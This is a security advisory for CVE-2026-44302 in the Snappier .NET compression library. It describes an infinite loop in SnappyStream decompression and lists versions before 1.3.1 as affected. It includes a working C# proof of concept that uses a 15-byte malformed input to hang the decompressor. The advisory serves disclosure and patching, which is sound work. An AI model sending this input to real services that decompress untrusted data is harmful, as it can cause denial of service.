GHSA-pggp-6c3x-2xmx
Suggest an improvement- Source
- https://github.com/advisories/GHSA-pggp-6c3x-2xmx
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-pggp-6c3x-2xmx/GHSA-pggp-6c3x-2xmx.json
- JSON Data
- https://api.osv.dev/v1/vulns/GHSA-pggp-6c3x-2xmx
- Aliases
-
- CVE-2026-44302
- Published
- 2026-05-06T20:53:23Z
- Modified
- 2026-05-06T21:05:10.674016Z
- Severity
-
- 7.5 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CVSS Calculator
- Summary
- Snappier has an infinite loop during SnappyStream decompression with malformed framed input
- Details
-
Summary
Snappier.SnappyStreamenters an uncatchable infinite loop when decompressing a malformed framed-format Snappy stream as small as 15 bytes.Details
The hang manifests as a userspace busy loop with SnappyStreamDecompressor.Decompress repeatedly calling Crc32CAlgorithm.Append. The exact non-terminating loop in or above Decompress has not been traced further.
PoC
using System.IO.Compression; using Snappier; byte[] data = { 0x00, 0x04, 0x00, 0x00, 0x64, 0x4e, 0x6c, 0x71, 0x79, 0x20, 0x77, 0x6f, 0x72, 0x6c, 0x64 }; using var src = new MemoryStream(data); using var snap = new SnappyStream(src, CompressionMode.Decompress); using var dst = new MemoryStream(); snap.CopyTo(dst); // never returnsImpact
A caller using
SnappyStreamon attacker-controlled bytes can be made to spin forever and burn a thread until the process is killed.try/catcharound the stream operation can't recover (no exception is thrown). - Database specific
{ "github_reviewed": true, "github_reviewed_at": "2026-05-06T20:53:23Z", "cwe_ids": [ "CWE-835" ], "severity": "HIGH", "nvd_published_at": null }- References
Affected packages
NuGet / Snappier
Package
- Name
- Snappier
- View open source insights on deps.dev
- Purl
- pkg:nuget/Snappier
Affected ranges
- Type
- ECOSYSTEM
- Events
-
Introduced0Unknown introduced version / All previous versions are affectedFixed1.3.1